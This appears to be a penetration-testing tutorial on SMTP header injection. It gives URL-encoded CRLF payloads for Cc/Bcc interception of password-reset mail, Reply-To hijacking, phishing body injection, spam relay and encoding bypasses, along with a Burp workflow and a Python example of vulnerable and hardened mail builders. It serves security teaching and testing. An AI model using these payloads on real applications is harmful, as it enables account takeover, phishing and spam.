SMTP Header Injection
SMTP header injection via CRLF in email form fields: injecting Cc/Bcc headers to intercept emails, spam relay, body injection, detection methodology, dummy header bypass, and Burp testing workflow.
What is SMTP Header Injection
SMTP (email) headers are separated by \r\n (CRLF). When a web application passes unsanitised user input into an SMTP header (From, To, Subject, Reply-To), an attacker can inject additional headers — redirecting mail, adding recipients, or injecting content into the email body.
This differs from CRLF injection in HTTP responses — the target here is the mail server, not the HTTP response.
Detection
Step 1 — Find email-sending functionality
Look for:
- Contact forms (name, email, message)
- Password reset emails
- Newsletter subscription forms
- Account notification settings
- Feedback / support ticket forms
Step 2 — Identify which fields appear in headers
The sender email and subject fields are the ones most commonly placed directly into SMTP headers. Test each field that might end up in the email’s From/Subject/Reply-To:
# Inject into email field
email=test@example.com%0d%0aCc:+attacker@evil.com
# Inject into subject field
subject=Test%0d%0aCc:+attacker@evil.com
# Inject into name field (if used in From header)
name=John%0d%0aCc:+attacker@evil.com
Step 3 — Confirm injection
Send the form. Check if attacker@evil.com receives the email (Cc injection worked) or observe an error response caused by the injected newlines.
In a black-box test, use a Collaborator subdomain as the injected Cc address: a DNS (MX) lookup recorded against that subdomain shows the mail server attempted delivery to the injected address.
SMTP Header Structure Reference
From: sender@example.com\r\n
To: recipient@example.com\r\n
Cc: copy@example.com\r\n
Bcc: hidden@example.com\r\n
Subject: Hello\r\n
Reply-To: reply@example.com\r\n
\r\n
Email body here.
Each header ends with \r\n. The blank line (\r\n\r\n) separates headers from the body.
Exploit 1: Cc / Bcc Header Injection
Intercept password reset emails or form confirmation emails sent to users:
email=victim@example.com%0d%0aCc:+attacker@evil.com
The application builds:
To: victim@example.com
Cc: attacker@evil.com
Subject: Password Reset
The attacker receives a copy of the password reset link.
Bcc (hidden copy):
email=victim@example.com%0d%0aBcc:+attacker@evil.com
Exploit 2: Multiple Header Injection
Inject multiple headers in sequence:
email=victim@example.com%0d%0aCc:+attacker@evil.com%0d%0aBcc:+attacker2@evil.com
Or add Reply-To to hijack responses:
email=victim@example.com%0d%0aReply-To:+attacker@evil.com
Any replies to the email go to the attacker.
Exploit 3: Subject Header Injection
Inject into the subject line to add additional headers:
subject=Hello%0d%0aCc:+attacker@evil.com
Builds:
Subject: Hello
Cc: attacker@evil.com
Exploit 4: Dummy Header Bypass
If the application appends more data after the user-controlled value, a trailing injected header might break the email. Add a dummy header to absorb the trailing content:
email=victim@example.com%0d%0aCc:+attacker@evil.com%0d%0aDummyHeader:+absorb
The application might build:
To: victim@example.com
Cc: attacker@evil.com
DummyHeader: absorb ← absorbs any trailing app-appended data
Exploit 5: Body Injection (Add New Body Content)
Inject a double CRLF to start the body section early, then inject content before the real body:
email=victim@example.com%0d%0aContent-Type:+text/html%0d%0a%0d%0a<h1>Click+here+to+verify:</h1><a+href="https://attacker.com">Verify+Account</a>
Builds:
To: victim@example.com
Content-Type: text/html
(blank line, start of body)
<h1>Click here to verify:</h1><a href="https://attacker.com">Verify Account</a>
... original body appended after
Exploit 6: Spam Relay
If the application allows injecting To/From headers, use it as a spam relay:
email=victim@example.com%0d%0aTo:+target1@spam.com,target2@spam.com%0d%0aFrom:+spoofed@legitimate.com%0d%0aSubject:+Win+a+Prize%0d%0a%0d%0aClick+here:+http://phishing.com
The trusted mail server sends spam on behalf of the legitimate application domain.
CRLF Encoding Variants
Different mail libraries decode differently, so try each of these:
- %0d%0a: standard URL-encoded \r\n
- %0a: just \n (some MTAs accept a bare LF)
- %0d: just \r
- \r\n literal (if not URL-decoded by the proxy)
- %250d%250a: double URL-encoded
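To tie the header-structure reference and the encoding variants together, here is an added Python example (not code from the original page) that builds a message the naive way, shows the page's Cc payload landing in the header block, and contrasts it with a hardened builder that rejects CR/LF, including the double-encoded variant. The function names and the sample form values are constructed for this illustration.

```python
from urllib.parse import unquote_plus

# Constructed sample input: the page's Cc-injection payload as the browser
# URL-encodes it in the form POST ('+' is a space, %0d%0a is CRLF).
FORM_EMAIL = "victim@example.com%0d%0aCc:+attacker@evil.com"
# Double-encoded variant: one decoding pass yields '%0d%0a', not CRLF.
FORM_EMAIL_DOUBLE = "victim@example.com%250d%250aCc:+attacker@evil.com"


def build_message_vulnerable(to_addr: str, subject: str, body: str) -> str:
    """Naive concatenation: the form value is copied verbatim into the header block."""
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}"


def header_names(raw_message: str) -> list:
    """Defender-side check: which headers does the built message actually contain?"""
    header_block = raw_message.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in header_block.split("\r\n")]


def crlf_after_decoding(value: str, rounds: int = 2) -> bool:
    """True if a CR or LF appears at any URL-decoding depth up to `rounds`.

    Catches %0d%0a, a lone %0a or %0d, and the %250d%250a double-encoded form,
    so the check holds even if a later layer decodes the value once more.
    """
    for _ in range(rounds + 1):
        if "\r" in value or "\n" in value:
            return True
        value = unquote_plus(value)
    return False


def build_message_safe(to_addr: str, subject: str, body: str) -> str:
    """Hardened builder: refuse any header value that could carry CR/LF."""
    for name, value in (("To", to_addr), ("Subject", subject)):
        if crlf_after_decoding(value):
            raise ValueError(f"CR/LF in {name} header value rejected")
    return f"To: {to_addr}\r\nSubject: {subject}\r\n\r\n{body}"


if __name__ == "__main__":
    # The web framework decodes the form once; the vulnerable builder then emits a Cc header.
    decoded = unquote_plus(FORM_EMAIL)
    print(header_names(build_message_vulnerable(decoded, "Password Reset", "reset link")))
    print(crlf_after_decoding(unquote_plus(FORM_EMAIL_DOUBLE)))
```

Validate on the exact string the mail layer will see, after every decoding step the framework applies; checking the raw form value alone misses the double-encoded case.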
Burp Suite workflow
- Proxy — intercept all form submissions that trigger email sending; identify fields used in From/Subject/Reply-To.
- Repeater — inject %0d%0aCc:+attacker@evil.com into the email, name, and subject fields.
- Collaborator — use a Collaborator subdomain as the injected Cc address to confirm blind injection without owning an external mailbox.
- Intruder — fuzz CRLF encoding variants to bypass input sanitisation.
- Check the application’s response: a 500 error on the injected request (but 200 on a clean one) often indicates the injected newlines produced a malformed SMTP command; adjust the encoding.